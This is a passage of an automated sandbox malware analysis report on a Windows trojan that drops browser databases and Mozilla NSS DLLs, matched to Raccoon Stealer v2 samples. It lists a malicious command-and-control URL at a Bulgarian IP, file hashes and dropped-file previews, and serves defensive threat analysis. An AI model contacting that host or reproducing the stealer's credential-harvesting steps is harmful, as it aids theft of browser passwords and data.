                      http://95.169.205.186/8895a7edf180661435c15d6dcaf4e416NRegAsm.exe, 00000002.00000002.2889674185.00000000012B9000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      http://95.169.205.186/8895a7edf180661435c15d6dcaf4e416PRegAsm.exe, 00000002.00000002.2889674185.00000000012A0000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      https://aka.ms/nativeaot-compatibilityHh60lAWJYfsL.exe, 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=U24ul5K3kmRD.2.dr, ScG62f2W5WaB.2.dr, h9pwT70RxGaI.2.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://mozilla.org0freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94576ZVk4VCTte.2.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.sqlite.org/copyright.html.sqlite3.dll.2.drfalse
                      • URL Reputation: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      95.169.205.186
                      		unknownBulgaria
                      		44814BTEL-BG-ASBGtrue

                      General Information

                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1468462
                      Start date and time:2024-07-06 04:21:05 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 5m 2s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:7
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:60lAWJYfsL.exe
                      renamed because original name is a hash value
                      Original Sample Name:f7f6eb480fe715733e509d0489171c18.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@4/20@0/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 86%
                      • Number of executed functions: 77
                      • Number of non-executed functions: 55
                      Cookbook Comments:
                      • Found application associated with file extension: .exe

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtOpenFile calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                      Simulations

                      Behavior and APIs

                      No simulations

                      Joe Sandbox View / Context

                      IPs

                      No context

                      Domains

                      No context

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      BTEL-BG-ASBGhttp://fwtnp.dfbf.maderclean.cl/giorgiobelfiore@dececco.itGet hashmaliciousUnknownBrowse
                      • 185.7.219.103
                      GVlpP9RL5tGet hashmaliciousMiraiBrowse
                      • 95.169.222.123

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      C:\Users\user\AppData\LocalLow\mozglue.dllJeNG2S9wKC.exeGet hashmaliciousRaccoon Stealer v2Browse
                        SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exeGet hashmaliciousRaccoon Stealer v2Browse
                          SnI2yBH5jJ.exeGet hashmaliciousRaccoon Stealer v2Browse
                            K3lQsBC5we.exeGet hashmaliciousRaccoon Stealer v2Browse
                              TCr4xC4lxh.exeGet hashmaliciousRaccoon Stealer v2Browse
                                o6zadjW4dI.exeGet hashmaliciousRaccoon Stealer v2Browse
                                  9eb062155df6ea9f702aa6a32aa414bd1c2c7c2b1fad3.exeGet hashmaliciousRaccoon Stealer v2Browse
                                    8f3f4f5ad819dc17618e1389476ca8e8f9d332196f64b.exeGet hashmaliciousRaccoon Stealer v2Browse
                                      f81795c9da60984703aeb170967d4bcc9fa1512c03623.exeGet hashmaliciousRaccoon Stealer v2Browse
                                        7a6ef55d260d003bef719a97408c302faf33f7a7b9f1f.exeGet hashmaliciousRaccoon Stealer v2Browse
                                          C:\Users\user\AppData\LocalLow\freebl3.dllJeNG2S9wKC.exeGet hashmaliciousRaccoon Stealer v2Browse
                                            SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exeGet hashmaliciousRaccoon Stealer v2Browse
                                              SnI2yBH5jJ.exeGet hashmaliciousRaccoon Stealer v2Browse
                                                K3lQsBC5we.exeGet hashmaliciousRaccoon Stealer v2Browse
                                                  TCr4xC4lxh.exeGet hashmaliciousRaccoon Stealer v2Browse
                                                    o6zadjW4dI.exeGet hashmaliciousRaccoon Stealer v2Browse
                                                      9eb062155df6ea9f702aa6a32aa414bd1c2c7c2b1fad3.exeGet hashmaliciousRaccoon Stealer v2Browse
                                                        8f3f4f5ad819dc17618e1389476ca8e8f9d332196f64b.exeGet hashmaliciousRaccoon Stealer v2Browse
                                                          f81795c9da60984703aeb170967d4bcc9fa1512c03623.exeGet hashmaliciousRaccoon Stealer v2Browse
                                                            7a6ef55d260d003bef719a97408c302faf33f7a7b9f1f.exeGet hashmaliciousRaccoon Stealer v2Browse

                                                              Created / dropped Files

                                                              C:\Users\user\AppData\LocalLow\2za3Lcohy0Th

                                                              Download File
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):49152
                                                              Entropy (8bit):0.8180424350137764
                                                              Encrypted:false
                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                              Malicious:false
                                                              Reputation:high, very likely benign file
                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\LocalLow\3zZ8MmQuSBH6

                                                              Download File
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                              Category:dropped
                                                              Size (bytes):114688
                                                              Entropy (8bit):0.9746603542602881
                                                              Encrypted:false
                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                              Malicious:false
                                                              Reputation:high, very likely benign file
                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\LocalLow\576ZVk4VCTte

                                                              Download File
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):9571
                                                              Entropy (8bit):5.536643647658967
                                                              Encrypted:false
                                                              SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                              MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                              SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                              SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                              SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                              C:\Users\user\AppData\LocalLow\5tjo8uqoagDA

                                                              Download File
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):98304
                                                              Entropy (8bit):0.08235737944063153
                                                              Encrypted:false
                                                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                              Malicious:false
                                                              Reputation:high, very likely benign file
                                                              Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\LocalLow\5tjo8uqoagDA-shm

                                                              Download File
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):32768
                                                              Entropy (8bit):0.017262956703125623
                                                              Encrypted:false
                                                              SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                              MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                              SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                              SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                              SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                              Malicious:false
                                                              Reputation:high, very likely benign file
                                                              Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\LocalLow\BZh1Z2j0t6WU

                                                              Download File
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\LocalLow\S5laZ7gMN2f9

                                                              Download File
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                              Category:dropped
                                                              Size (bytes):114688
                                                              Entropy (8bit):0.9746603542602881
                                                              Encrypted:false
                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\LocalLow\ScG62f2W5WaB

                                                              Download File
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.1358696453229276
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\LocalLow\U24ul5K3kmRD

                                                              Download File
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.1358696453229276
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\LocalLow\U77f89f243v6

                                                              Download File
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                              Category:dropped
                                                              Size (bytes):114688
                                                              Entropy (8bit):0.9746603542602881
                                                              Encrypted:false
                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\LocalLow\freebl3.dll

                                                              Download File
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):684984
                                                              Entropy (8bit):6.857030838615762
                                                              Encrypted:false
                                                              SSDEEP:12288:0oUg2twzqWC4kBNv1pMByWk6TYnhCevOEH07OqHM65BaFBuY3NUNeCLIV/Rqnhab:0oUg2tJWC44WUuY3mMCLA/R+hw
                                                              MD5:15B61E4A910C172B25FB7D8CCB92F754
                                                              SHA1:5D9E319C7D47EB6D31AAED27707FE27A1665031C
                                                              SHA-256:B2AE93D30C8BEB0B26F03D4A8325AC89B92A299E8F853E5CAA51BB32575B06C6
                                                              SHA-512:7C1C982A2B597B665F45024A42E343A0A07A6167F77EE428A203F23BE94B5F225E22A270D1A41B655F3173369F27991770722D765774627229B6B1BBE2A6DC3F
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                              Joe Sandbox View:
                                                              • Filename: JeNG2S9wKC.exe, Detection: malicious, Browse
                                                              • Filename: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe, Detection: malicious, Browse
                                                              • Filename: SnI2yBH5jJ.exe, Detection: malicious, Browse
                                                              • Filename: K3lQsBC5we.exe, Detection: malicious, Browse
                                                              • Filename: TCr4xC4lxh.exe, Detection: malicious, Browse
                                                              • Filename: o6zadjW4dI.exe, Detection: malicious, Browse
                                                              • Filename: 9eb062155df6ea9f702aa6a32aa414bd1c2c7c2b1fad3.exe, Detection: malicious, Browse
                                                              • Filename: 8f3f4f5ad819dc17618e1389476ca8e8f9d332196f64b.exe, Detection: malicious, Browse
                                                              • Filename: f81795c9da60984703aeb170967d4bcc9fa1512c03623.exe, Detection: malicious, Browse
                                                              • Filename: 7a6ef55d260d003bef719a97408c302faf33f7a7b9f1f.exe, Detection: malicious, Browse
                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...&.9b.........."!.........6...........................................................@A........................4,..S....,..........x............T..........8$...&...............................0..................D............................text............................... ..`.rdata.......0......................@..@.data...<F...@.......&..............@....00cfg...............(..............@..@.rsrc...x............*..............@..@.reloc..8$.......&..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\LocalLow\h9pwT70RxGaI

                                                              Download File
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.1358696453229276
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\LocalLow\ko01ZPG2VU50

                                                              Download File
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                              Category:dropped
                                                              Size (bytes):28672
                                                              Entropy (8bit):2.5793180405395284
                                                              Encrypted:false
                                                              SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                              MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                              SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                              SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                              SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\LocalLow\mozglue.dll

                                                              Download File
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):627128
                                                              Entropy (8bit):6.792651884784197
                                                              Encrypted:false
                                                              SSDEEP:12288:dfsiG5KNZea77VUHQqROmbIDm0ICRfCtbtEE/2OH9E2ARlZYSd:df53NZea3V+QqROmum0nRKx79E2ARlrd
                                                              MD5:F07D9977430E762B563EAADC2B94BBFA
                                                              SHA1:DA0A05B2B8D269FB73558DFCF0ED5C167F6D3877
                                                              SHA-256:4191FAF7E5EB105A0F4C5C6ED3E9E9C71014E8AA39BBEE313BC92D1411E9E862
                                                              SHA-512:6AFD512E4099643BBA3FC7700DD72744156B78B7BDA10263BA1F8571D1E282133A433215A9222A7799F9824F244A2BC80C2816A62DE1497017A4B26D562B7EAF
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              • Antivirus: Virustotal, Detection: 3%, Browse
                                                              Joe Sandbox View:
                                                              • Filename: JeNG2S9wKC.exe, Detection: malicious, Browse
                                                              • Filename: SecuriteInfo.com.Win32.TrojanX-gen.18137.22438.exe, Detection: malicious, Browse
                                                              • Filename: SnI2yBH5jJ.exe, Detection: malicious, Browse
                                                              • Filename: K3lQsBC5we.exe, Detection: malicious, Browse
                                                              • Filename: TCr4xC4lxh.exe, Detection: malicious, Browse
                                                              • Filename: o6zadjW4dI.exe, Detection: malicious, Browse
                                                              • Filename: 9eb062155df6ea9f702aa6a32aa414bd1c2c7c2b1fad3.exe, Detection: malicious, Browse
                                                              • Filename: 8f3f4f5ad819dc17618e1389476ca8e8f9d332196f64b.exe, Detection: malicious, Browse
                                                              • Filename: f81795c9da60984703aeb170967d4bcc9fa1512c03623.exe, Detection: malicious, Browse
                                                              • Filename: 7a6ef55d260d003bef719a97408c302faf33f7a7b9f1f.exe, Detection: malicious, Browse
                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....9b.........."!.........V......./....................................................@A............................cQ......,....p...............r..........4C...........................W......h0...............................................text............................... ..`.rdata.......0......................@..@.data........0......................@....00cfg.......P....... ..............@..@.tls.........`......."..............@....rsrc........p.......$..............@..@.reloc..4C.......D..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\LocalLow\msvcp140.dll

                                                              Download File
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):449280
                                                              Entropy (8bit):6.670243582402913
                                                              Encrypted:false
                                                              SSDEEP:12288:UEPa9C9VbL+3Omy5CvyOvzeOKaqhUgiW6QR7t5s03Ooc8dHkC2esGgW8g:UEPa90Vbky5CvyUeOKg03Ooc8dHkC2ed
                                                              MD5:1FB93933FD087215A3C7B0800E6BB703
                                                              SHA1:A78232C352ED06CEDD7CA5CD5CB60E61EF8D86FB
                                                              SHA-256:2DB7FD3C9C3C4B67F2D50A5A50E8C69154DC859780DD487C28A4E6ED1AF90D01
                                                              SHA-512:79CD448E44B5607863B3CD0F9C8E1310F7E340559495589C428A24A4AC49BEB06502D787824097BB959A1C9CB80672630DAC19A405468A0B64DB5EBD6493590E
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L....(.[.........."!.....(..........`........@............................................@A.........................g.......r...........................?.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\LocalLow\nss3.dll

                                                              Download File
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):2042296
                                                              Entropy (8bit):6.775178510549486
                                                              Encrypted:false
                                                              SSDEEP:49152:6dvFywfzFAF7fg39IwA49Kap9bGt+qoStYnOsbqbeQom7gN7BpDD5SkIN1g5D92+:pptximYfpx8OwNiVG09
                                                              MD5:F67D08E8C02574CBC2F1122C53BFB976
                                                              SHA1:6522992957E7E4D074947CAD63189F308A80FCF2
                                                              SHA-256:C65B7AFB05EE2B2687E6280594019068C3D3829182DFE8604CE4ADF2116CC46E
                                                              SHA-512:2E9D0A211D2B085514F181852FAE6E7CA6AED4D29F396348BEDB59C556E39621810A9A74671566A49E126EC73A60D0F781FA9085EB407DF1EEFD942C18853BE5
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....9b.........."!.........&...............................................`............@A.........................!..\...T...@....@..x....................P..h...h...................................................\....!..@....................text...i........................... ..`.rdata..............................@..@.data....N.......*..................@....00cfg.......0......................@..@.rsrc...x....@......................@..@.reloc..h....P......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\LocalLow\softokn3.dll

                                                              Download File
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):254392
                                                              Entropy (8bit):6.686038834818694
